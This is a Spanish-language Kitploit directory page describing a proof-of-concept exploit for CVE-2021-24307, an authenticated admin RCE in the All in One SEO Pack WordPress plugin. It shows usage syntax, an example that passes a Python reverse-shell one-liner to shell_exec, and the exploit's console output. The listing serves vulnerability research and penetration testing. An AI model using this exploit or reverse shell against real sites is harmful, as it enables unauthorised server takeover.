Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-24307-all-in-one-seo-pack-admin-rce — Prueba de concepto de exploit para CVE-2021-24307, un RCE de administrador autenticado en All in One SEO Pack <= 4.1.0.1 mediante deserialización de PHP, que permite la ejecución arbitraria de comandos. | Kitploit
Herramientas/GitHubGitHub/darkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubdarkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307-all-in-one-seo-pack-admin-rce

Prueba de concepto de exploit para CVE-2021-24307, un RCE de administrador autenticado en All in One SEO Pack <= 4.1.0.1 mediante deserialización de PHP, que permite la ejecución arbitraria de comandos.

Ver Repositorio
425hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RCE por deserialización de PHP en el panel de administración de All in One SEO Pack (CVE-2021-24307)

PoC simple de un RCE autenticado como administrador en AISEO <= 4.1.0.1, proporcionado como ejemplo.

Artículo completo aquí: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/

Uso:

root@kitploit:~
php exploit.php url login password php_command arguments [proxy]

Ejemplo:

root@kitploit:~
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080

-- All-in-one-seo-pack <= 4.1.0.1 RCE autenticado como administrador --
-- Exploit por Vincent MICHEL (@darkpills) --

[+] Autenticando en wordpress http://wordpress/
[+] Obteniendo nonce de la API REST de WP
[+] Nonce encontrado: 6aeb9ddf05
[+] Generando payload POST para ejecutar el comando: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'")
[+] Subiendo archivo ini con la configuración de importación
[+] ¡Listo! Comprueba el resultado en algún lugar (ejecución de comandos a ciegas)
Descargar herramienta